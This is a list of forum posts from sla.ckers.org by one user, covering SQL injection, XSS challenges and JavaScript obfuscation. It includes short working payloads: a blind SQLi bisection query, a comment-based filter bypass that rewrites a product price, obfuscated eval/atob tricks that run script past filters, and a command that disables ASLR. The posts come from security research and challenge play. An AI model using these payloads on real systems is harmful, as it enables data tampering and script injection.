Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Current Page: 1 of 1
Results 1 - 9 of 9
2 years ago
tr3w
Yes, you need to turn off ASLR. Try running this as root: # sysctl -w kernel.randomize_va_space=0
Forum: SQL and Code Injection
3 years ago
tr3w
You can get each character through a simple bisection method using a BETWEEN clause: index.php?=IF(SUBSTR(SELECT table_name FROM information_schema.tables LIMIT 1,1),1,1) BETWEEN 0x30 AND 0x45, 60,0)
Forum: SQL and Code Injection
3 years ago
tr3w
Done. It was fun :) FF4 and GC killed a lot of blacklist filters :O
Forum: XSS Info
3 years ago
tr3w
@SW: alert coookie @thornmaker: Sorry. It should be "just by typing into the URL bar". I corrected the discrepancy in the rules. However, I closed the challenge a week ago and I'm no longer updating the leaderboard.
Forum: Obfuscation
3 years ago
tr3w
This started as a curiosity. I wanted to find different ways to run JavaScript with heavily limited character sets. Then, after having so much fun with LightOS's awesome SQLi challenge (http://sla.ckers.org/forum/read.php?24,36040), I decided to turn one of my little experiments into a XSS Challenge :). This way people will have fun attempting to solve it, and I'll be able to learn from your solut
Forum: Obfuscation
4 years ago
tr3w
A dirty little trick to make strings out of unreadable characters: atob(['jm','f67','ipwM','M)','r','t(1+M']['map'](btoa)['join']([])['replace'](/[0A=]/g,[]))
Forum: Obfuscation
4 years ago
tr3w
@.mario oh right, thanks, and dots can also be avoided, heh, maybe it's very impractical eval((<_><_>ale</_><_>rt(1)</_></_>[<>_</>][<>*</>])]())
Forum: Obfuscation
4 years ago
tr3w
String concatenation without quotes and addition signs: eval([<>ale</>,<>rt(1)</>][<>join</>]([])) // only firefox
Forum: Obfuscation
4 years ago
tr3w
Yeah, all their sql injection protections are easily bypassed just with single line comments foo'/**/or 1=1;/**/update/**/productinventory/**/set/**/listprice=101/**/where/**/productname='solarpanel_type2'-- I think some of those /**/ are not necessary but I'm too lazy to test.
Forum: News and Links
Current Page: 1 of 1